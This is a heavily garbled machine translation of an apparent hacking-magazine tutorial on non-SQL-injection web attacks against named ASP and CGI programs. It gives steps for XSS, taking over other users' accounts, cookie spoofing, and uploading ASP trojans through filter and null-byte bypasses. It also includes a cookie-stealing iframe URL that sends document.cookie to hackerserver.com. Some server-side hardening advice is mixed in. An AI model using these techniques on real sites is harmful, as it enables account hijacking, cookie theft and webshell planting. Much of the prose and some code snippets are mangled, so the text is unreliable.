Research on the exploit of non-Si vulnerability in Web program

Part I Preface
Now the most popular web site attack means, to count on the SQL injection, although the SI technology easy to learn to use, and easy to obtain greater access, but because its thunder is too big, now generally a little bit of security awareness programmers will notice this problem, And the data submitted by the Get method is recorded by the server, which makes it easy for the network administrator to find the intruder.
Non-Si class attacks have relatively little access to server operations, but they are useful for intrusion purposes with access to data.
Part II Method Introduction
Conventional non-SI types of attacks are as follows:
I. Cross-site scripting attacks (XSS)
Cross-site scripting attacks do not directly damage the Web server, whose main target is visitors to the site, where the intruder has roughly three purposes:
One is to the website page browser infringement: such as in the Web page to add the automatic download code, or use like IE frame loopholes such as to the browser to implant the Trojan, or hijacked the browser.
The second is to steal the visitor's cookies. Intruders can create a page that can accept and save information on their website and add a hidden iframe with a long width of 0 on the page of the hacked site: http://hackerserver.com/get.asp?info= Document.cookies, the server-side get.asp page accepts info information and keeps it in the database, so intruders can get the cookies from the visitor on the hacked site. If the theft is the general user's password, the harm is not very large, but if the intruder to use social engineering, so that the login and password stored in the cookies in the Administrator access page, you can steal the administrator password, thereby further control the site.
The third is to use a large number of visitor requests to repeat an operation. A time ago a business website News said that a well-known search engine in its search alliance to join the hidden IFRAME to visit the business site, DDoS attacks on it caused its server load too large. And don't say this thing is true, but this kind of thinking is we should pay attention to. In the 11 issue of the hacker x file, in 2004, there was an article called "Playing the X-Tree" (page 62nd), where the author used a cross-site scripting attack to insert a posting code on the page, which caused the number of spam posts to skyrocket, and the server overwhelmed nearly to collapse.
Cross-site attacks may seem simple, but it is complicated to bypass the program's filtering of illegal characters by simply adding dangerous code to the content you submit (such as comments). Commonly used means are: change case, convert to Asii code or escape character, call remote JS script files, such as the deformation and hiding methods, the use of flash Geturl parameters and so on.
Little Trick
1, how to deal with the form of detection.
Some websites to prevent Cross-site scripting attacks, add some JavaScript code to the form to detect the value of the text box, pop-up the dialog box prompt if it is not legitimate, and prohibit the submission, but this limit on the client is equivalent to nothing, we can save the Web page locally, Remove the corresponding detection of JS code, and then modify the page form's action attribute, so that it points to the site, and then submitted, if the site did not verify the server side again, it will be invaded. (This loophole exists in the Information Technology Examination Program of high school students in Hebei province.) )
2, about UBB.
The UBB code is a means by which a program can restrict the HTML code without causing the submitted information to be too monotonous, by letting the user use some specific tags and then converting the tags on the server side, but it still poses a risk if the converted statements are not written properly. (We'll further show the way around Ubb in later examples.) ）
Below, please follow me with an example to understand:
Instance 1-1: No filtered script insert
This is a mobile mall a version of the "Customer feedback" function, is a fk.asp, called the Self-submission page, where the data stored to the database code is like this.

Rs.addnew
RS (\ "fksubject\\") =checkffsqlstr (Trim (Request (\ "fksubject\\"))
RS (\ "fkleixing\\") =checkffsqlstr (Request (\ "fkleixing\\"))
RS (\ "fkcontent\\") =checkffsqlstr (Trim (Request (\ "fkcontent\\")) ' Look, no dangerous character filtering
RS (\ "fkusername\\") =checkffsqlstr (Trim (Request (\ "fkusername\\"))
RS (\ "fkemail\\") =checkffsqlstr (Trim (Request (\ "fkemail\\"))
RS (\ "fktel\\") =checkffsqlstr (Trim (Request (\ "fktel\\"))
RS (\ "fklaizi\\") =checkffsqlstr (Trim (Request (\ "fklaizi\\"))
RS (\ "fkdate\\") =now
RS (\ "fkip\\") =request.servervariables (\ "remote_addr\\")
Rs.update
Rs.close
It's not hard to find out the program in the data into the database before only to have to make up the character of Si is filtered (this filter is just not necessary, because the parameters do not introduce query conditions) and the dangerous character Furu script and so did not filter, show the page lyb.asp also did not first filtered and then displayed. If we submit <script>alert (Document.cookie) </script&gt in the message, we can eject the user's cookie information. (as shown in figure I)
Example 1-2: Filtering bad UBB script inserts
A famous blog program of the UBB conversion page ubbcode.asp which converts the dangerous character of a fragment as follows:


str = Replace (str, \ \ "script\\", \ "script\\")
str = Replace (str, \ \ "script\\", \ "script\\")
str = Replace (str, \ \ "script\\", \ "script\\")
str = Replace (str, \ \ "script\\", \ "script\\")
We can submit characters such as script to circumvent this restriction, such as submitting information

[img]javascript:window.close () [/IMG] (remove space)
You can close the window.

Second, ultra vires attack
Ultra-vires attack is due to the programmer's access to the page is not perfect detection, so that intruders do not need to get the user or administrator password to access only a specific user or administrator to access pages of a vulnerability.
This ultra vires reminds me of a long, long time ago (about 2000 years ago), the popular "chat room to play the NPC law" is the use of access to certain users of the right to detect the wrong chat room program responsible for kicking people's pages to achieve the goal of any kick.
However, this kind of more administrator privileges vulnerabilities are usually more covert, especially for non-open-source programs, most can only rely on experience to guess. Another example of the more common user rights: A program to modify the user data page by getting get parameters to introduce the program to process, display relevant data, such as: Http://targetzone.com/edituser.asp?userid=Daniel, This would have been to modify the user Daniel's data, but if the program did not add other validation, we can modify the parameters of the value of any user's data, such as submitting http://targetzone.com/edituser.asp?userid=Kitty to modify the information of the kitty user.
Programmers in the production of such programs should verify the session to determine whether the user logged in, and should be from the session to obtain the current login username, the rest such as get,cookies data are not trustworthy.
Another kind of ultra vires, we can call "step over the ultra vires", this kind of flaw is for certain to need n steps to complete the process, step X does not detect whether completes the X-1 step to allow the attacker to skip the front X-1 step. This vulnerability often occurs in the recovery of the password of the program, the final verification of the password to modify the page is only to modify the user name in a hidden domain in the way of the Web page, but the next step does not carry out the relevant detection results can modify any user's password.
Little Trick
1, the use of hidden domains.
Many programmers prefer to use the form to hide fields instead of passing the arguments that appear in the program in some steps. For some sensitive data, this can save a certain amount of server resources, but this is very dangerous for some of the time-sensitive data because the user does not see hidden fields on the Web page. However, users can view the source code to find hidden fields, and can achieve the ultra vires by saving the Web page locally and modifying the value of the hidden field.
OK, let's look at a few examples:
Example 2-1: A version of the mobile mall to retrieve the user password of the more step vulnerability
Dynamic Mall of this version of the loophole is many, the part of its recovery password is divided into 4 pages, getpwd.asp~getpwd4.asp, respectively, corresponding to fill in the user name, fill out the answer to the password, reset the password, the new password to update the operation of the database. Part of Getpwd4.asp's code is written in this way.


<%username=request (\ "username\\")
PASSWD=MD5 (Trim (Request.Form (\ passwd\\)))
Set Rs=server.createobject (\ "adodb.recordset\\")
Sql=\\ "SELECT * from [user] where username= ' \" &username&\\ "' \"
Rs.Open sql,conn,1,3
If rs.eof Then
%>
<script language=\\ "javascript\\" >
Alert (\ "" This user has not yet registered, please register on the homepage!) \\")
Location.href=\\ "Javascript:history.back () \"
</script>
<%
Else
RS (\ "userpassword\\") =passwd
Rs.update
End If
Rs.close
Set rs=nothing
Conn.close
Set Conn=nothing%&gt .....
You can find that the first line does not detect requect data to fill the relevant information.
Let's say we steal the user's password for some reason: we can do this: register a new user, Daniel, and write down the answer to the question, and then go back to the password. Until getpwd3.asp this page, save this page locally, open the page in Notepad, change Daniel in the form's action attribute value to kitty, add the URL complete, and then open the page locally, fill in the password and submit it to modify Kitty's password for the secret you just filled out on this page Code.
Example 2-2: Nine Cool network personal homepage Space Management System 3.0 ultra vires Vulnerability:
In the program to detect whether the landing is through the page include file chkuser.asp to achieve


<%if session (\ "user_userid\\") =\\ "\" or session (\ "user_username\\") =\\ "\" Then ' vulnerability reason
response.write\\ "<script>alert (' Sorry, you haven't logged in or logged in error!") '); top.location.href= ' index.asp ' </script>\\ '
Response. End
End If
%>
As you can see, this file only checks whether the session is empty, and does not check whether the operation is currently logged in user! So this program has a number of unauthorized loopholes, first look more users modify the data vulnerability: After landing can see the interface is divided into the upper, left and right three frames. The top frame is primarily a few navigational connections, holding down SHIFT to "modify profile" to open it in a new window with the address: Http://127.0.0.1/edituser.asp?userid=39&username=Daniel, it's not hard to see , the value of the username parameter in the address is the current username, so let's try to change it ... Open the page http://127.0.0.1/edituser.asp?userid=39&username=kitty,bingo! page to display the information we signed up for the Kitty user! Change it casually ... Here we can modify its password question and answer, and then through the "Forgotten password" feature to modify the user's password. Then look at the vulnerability to display and modify any user files. After detection, the page responsible for displaying the list of files is Http://127.0.0.1/main.asp?userid=39&username=Daniel&path=Daniel, We can browse, upload, delete, rename the files on the server by modifying the value of path.
Instance 2-3:lb5000 Modify the Registration Declaration vulnerability
Because the Rei LB5000 setregmsg.cgi and setregrules.cgi Two files have an ultra vires vulnerability, resulting in the attacker can directly modify the forum "registration Statement" and "SMS welcome message." Submit the following request to modify the "registration statement": http://www.targetzome.com/cgi-bin/setregrules.cgi?action=process&therules= what you want to modify. We can write some cross station code through this.
Third, Cookies cheat
What is cookies, cookies are a text file stored in the browser directory, record your access to a specific site information, and can only be created by the site of this cookie read back, about 255 characters, only 4KB hard disk space. When a user is browsing a site, it is stored in the client's memory, and after exiting the browser, it is stored on the user's hard disk. Most of the information stored in cookies is common, such as when you browse a site, this file records each keystroke information and the address of the visited site. But many Web sites use cookies to store personal data, such as password, username, credit card number, and so on.
Cookie spoofing is the client on the site to read the cookies modified into the value of our want to camouflage the program to deceive, let it mistakenly think we have landed users to achieve a certain purpose, it can be said that this is also a way of overstepping authority.
We still say that some programmers do not estimate the risk, the client too much trust, the store should be stored in the session of sensitive information stored in the cookies caused this loophole, so the vulnerability is relatively covert.
The general idea for such an attack is to get a legitimate cookies-> use tool to modify the Cookies-> Access Restrictions page, exceeding the limits of success.
Suppose we have a legal account on the site http://targetzone.com Daniel, now we want to log in as the user kitty, but we don't have Kitty's password (nonsense, or else attack ...), We try to use cookies to cheat the way to achieve the goal:
As Daniel's identity landing targetzone.com and choose to save the login data, close the browser, use IECookiesView This software to open the local cookies information, select the site targetzone.com, Modify username value for Kitty, visit the website again and find that we have landed as Kitty.
But this kind of attack also has a relatively big mishap, and does not say the website whether to keep the information in the cookies, has the website to have the user name and the password to keep together in the cookie, each time accesses according to the user name and the password carries on the examination, then judges whether legally. So this loophole is actually used alone is not very effective, but with other intrusion is much better, such as the download of a site database, but the password is MD5 encryption, unless the violence to crack out the value of MD5 hash, otherwise can not landing on the site, However, if the site is the user name and MD5 password stored in the cookies, we can apply. or the site to prevent the SI measures more stringent, in the URL can not find the injection point, in the cookies to find injection points. There are also Web sites to the user's permissions in the cookies, can also be modified to achieve the purpose of elevation of authority.
Instance 3-1 Spoofing Vulnerability for a download program:
The code that handles the login is this:


<%if Cookies (\ "down_isadder\\") =\\ "\" then%>
<script language=\\ "vbscript\\" >
MsgBox (\ "Sorry, you do not have permissions to manage users!") If you are an administrator, please login! \\")
Window.close ()
</script>
<%Else%>
............
True halo, only detected that the cookies are empty, so we use IECookiesView to change the value of Down_isadder to any value (of course, except for the null value) can be logged management.
Instance 3-2:l-blog cookie ultra vires upload Spoofing Vulnerability:
The recent loophole has really destroyed weblog, including many hackers. L-blog's Cookies-extracting file has a logical vulnerability that allows any user to upload files across to Administrator privileges.
Part of the code for the file attachment.asp:
IF memstatus= "supadmin" OR memstatus= "Admin" Then
IF request.querystring ("action") = "Upload" Then
You can see that the program detects the value of the supadmin is not the corresponding value of the administrator, if it is allowed to upload, and did not detect the user who logged in. Then look at the program command.asp to verify cookies, and detect if MemName (the user name obtained in cookies) is empty, no action is made. If not NULL, verify that the saved username and password are correct and that the cookies are not properly emptied. Here we leave a loophole, if the user name value (memname) in the cookie is empty, and the value of the user right (Memstatus) is not NULL, This command.asp file does not verify the username and password, but the upload page detected memstatus is the administrator, you can upload.
We can register ordinary users, log in and save cookies, modify cookies so that the value of MemName is empty, memstatus value is supadmin or admin, then you can upload.
But can only upload a few files, we can not upload ASP trojan, how to do it ... Let's take a look at how to pass the ASP Trojan.
Iv. illegal uploading of loopholes
To be legally illegal, let's start with two simple loopholes.
Some programs restrict extensions such as Asp,asa, but let's look at the IIS settings. Found that some extensions are explained by Asp.dll, such as CER so if some programs do not allow uploading ASP files, we can change the name of the Trojan to a CER, and then upload, then if the server did not remove the CER resolution, we can run the Trojan. There are also file extensions that can execute SSI (Server Side Include) directives, such as STM, to upload a seeit.stm file that reads "<!--#include file=" conn.asp "-->", You can then access the file to see the contents of the conn.asp file. So programmers in the upload test, should be set what kind of file to allow upload and not what kind of files can not upload.
Besides, the bug about uploading the program.
A while ago the Move Network forum upload loophole is a storm Ah, Daniel also use this loophole to attack a lot of stubborn chicken , we first move the network upload to analyze:
The dynamic network is not allowed to upload the ASP and other dangerous files, but its upload processing has a certain loophole caused the program to get the wrong parameters so that intruders can upload arbitrary files.
First look at the submitted upload of a page reg_upload.asp:


<form name=\\ "form\\" method=\\ "post\\" action=\\ "upfile.asp\\" enctype=\\ "multipart/form-data\\" >
<input type=\\ "hidden\\" name=\\ "filepath\\" value=\\ "uploadface\\" >
<input type=\\ "hidden\\" name=\\ "act\\" value=\\ "upload\\" >
<input type=\\ "file\\" name=\\ "file1\\" >
<input type=\\ "hidden\\" name=\\ "fname\\" >
<input type=\\ "submit\\" name=\\ submit\\ "value=\\" Upload \ "onclick=\\" Fname.value=file1.value, Parent.document.forms[0]. Submit.disabled=true,
Parent.document.forms[0]. Submit2.disabled=true;\\ ">
</form>
The procedure is to extract the File1 form and fname the values in the form to make a judgment. That is to say directly from the page to upload the ASP file program will be detected. However, we can construct our own data packages and use NC submissions to achieve the goal of bypassing detection. But our main problem is that after uploading the file must be ASP format, although the value of file1 is legitimate, but ultimately to achieve the purpose of saving the extension of ASP should do?
There is one sentence in the component-less upload class that is used to move the net:


Filename=formpath&year (now) &month-&day (now) &hour (now) &minute (now) &second (now) & rannum&\\ ". \" &fileext
This filename is the file name of the saved file that the program generates. The key to detecting a string in a computer is to see if the character is encountered, and if so, the string is considered to be over. That is, when we construct the upload file to save the path, just trick the computer and let him think that the path parameter like "Uploadfacedaniel.asp" is over, We can achieve our goal.
The principle of this loophole is analyzed here, many uploads now exist such a loophole, first grasp the package and then manually submitted is too tired, Daniel suggested that you use some of the Internet upload loopholes to reduce the burden of the use of tools.
Let's look at one of my power 3.51 vulnerabilities. Part of the code for its uploaded page upfile_soft.asp is this:


Fot i=0 To UBound (Arrupfiletype)
If Fileext=trim (Arrupfiletype (i)) then
Enableupload=true
Because my power to upload the class can upload multiple files, we can see from the above code, if upload multiple files, the N-1 file extension is not legitimate, and the nth file extension is valid, can be detected by. So we just build our own page, upload two files, and the second extension is the program can upload, it can. However, my power system is to prohibit the external submission of forms, how to circumvent this limit, please see-the form of attack and defense.
Little trick:
1, the use of database backup to restore the function of the legal become illegal.
After all, there are many systems do not have the logic of the upload of loopholes, then how do we upload the script Trojan. This trick requires you to log in to the background, and the site system has the ability to back up and restore the database. Now through legal channels to rename the Trojan to the legitimate extension of the upload, then in the backup and restore the database page, the uploaded file name in the backup and restore path, and then restore, because the program is the database to the ASP extension stored, so the Trojan can also be normal resolution.
V. Attack and defense of forms
Some of the previous parts of this article have mentioned some of the unsafe elements of the form in the program, so let's summarize. The main idea for a form's attack is to save the page containing the form locally, modify it to remove the restrictions, and submit the address of the action to the address on the Web site before submitting it.
So it's not hard to see that everything about the form, if not validated again on the server side, is dangerous and untrustworthy. It is recommended that programmers check the legality of the form on the client while trying to verify it again on the server side and add the corresponding code to prohibit the external submission on the server side. ：


<%server_v1=cstr (Request.ServerVariables (\ "http_referer\\"))
Server_v2=cstr (Request.ServerVariables (\ "server_name\\"))
If Mid (Server_v1,8,len (SERVER_V2)) <>server_v2 Then
Response.Write \ "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=# Eeeeee width=450>\\ "
Response.Write \ "<tr><td style= ' font:9pt Verdana ' >\\ '"
Response.Write \ "You have submitted a wrong path, prohibit the submission of data from outside the site please do not mess with this parameter!" \\"
Response.Write \ "</td></tr></table></center>\\"
Response.End
End If%>

Let's think about what forms are restricted: JS legality check, hidden domain, not modifiable (ReadOnly) domain.
Do not know whether you still remember Ofstar Forum Forum Group, using a readonly domain to display a group of members, we can download the Web page, remove the ReadOnly attribute, and then you want to join the membership of this forum, and then submit ...
Little trick:
1, bypassing the prohibition of external submissions:
You can write a socket program to modify the value of Http_referer, but this method is more troublesome, I introduce a simple.
This trick requires you to have permission to upload images. When IE opens the picture, if the image is HTML code, it can run its code like a Web page. So we can change the structure of the page to expand the image, and upload, Access this page and submit is submitted on the server side. (Note: This method must write all of the underlying tags, such as
Example 5-1: Nine Cool network personal homepage Space Management System 3.0 upload vulnerability to any directory:
After landing, click the "Upload File" button, pop-up a Web page, which can set the number of uploads, there is a text box upload directory, but can not be modified in IE will be saved in this page, and then find the 44th line of the file, the code is: <LI> uploaded to: <input class =input style= "width:200px" ReadOnly ... We delete this readonly, then find the file line 37th, the form tag in the action attribute of the value complement (that is, add the site), and then open the page locally, at this time, "upload the inverted" text box can be modified, we will change it to: ... /, select File Upload, you can find that this file has been uploaded to the previous level of the directory.

Vi. loopholes in the contents of Bauku and Storm files
We've all heard of the%5c Bauku loophole. is to manipulate the database page to the address bar closest to the filename of the "/" to "%5c", if the following conditions are met, you can see the path of the database: The General error return page is local IE provided, so we have to close the local error page, Specifically in the menu item's ' tool->internet option-> Advanced-> display friendly information '; If the other database is access type,%5c Bauku need a level two directory, the level of the directory can not be successful, the other side of the page has no fault-tolerant statements. The principle is more complex, please your own google.
Some programmers like to write include Page Extensions as Inc., and many tutorials recommend it, but this makes the program a big loophole Because the INC default is not resolved by Asp.dll, it is displayed directly as text, so that if someone can access your database-defined page (such as Conn.inc), the database address or the password for the SQL account.
Some Web sites to prevent the software download hotlinking, for downloading software is a page read, and then output stream to the client, its filename parameters are usually get way attached to the address, such as http://targetzone.com/down.asp?path= Daniel.zip, we can probably guess the location of the data link file relative to the software library, and change the value of the path parameter, if you are lucky, you can download to the data link file without Asp.dll resolution.
Part III Summary and PostScript
It's early morning, the sun is rising, the sun is shining, and it takes about 3 days of spare time to write this article that basically ends here, however, I would like to emphasize that the Web site procedures for the non-Si vulnerability is much more than this, and many unknown logical loopholes have not been found, the topic due to space and time constraints, Only a few of the current more commonly used means made a simple introduction, I hope that Daniel can play a role for everyone, if you really seriously study some of the online program code, you can find that many people have not been found to appear.
The loophole is not terrible, the terrible is that the programmer does not have a rigorous attitude and complete, thoughtful thinking.
Old potato had asked me how to think about this subject, in fact, I just will use NBSI random site of the rookie (including my own) behavior feel deeply regret and worry, only use tools hackers are not hackers, we must learn to use their own ideas to find loopholes, repair loopholes in order to achieve real technical improvement.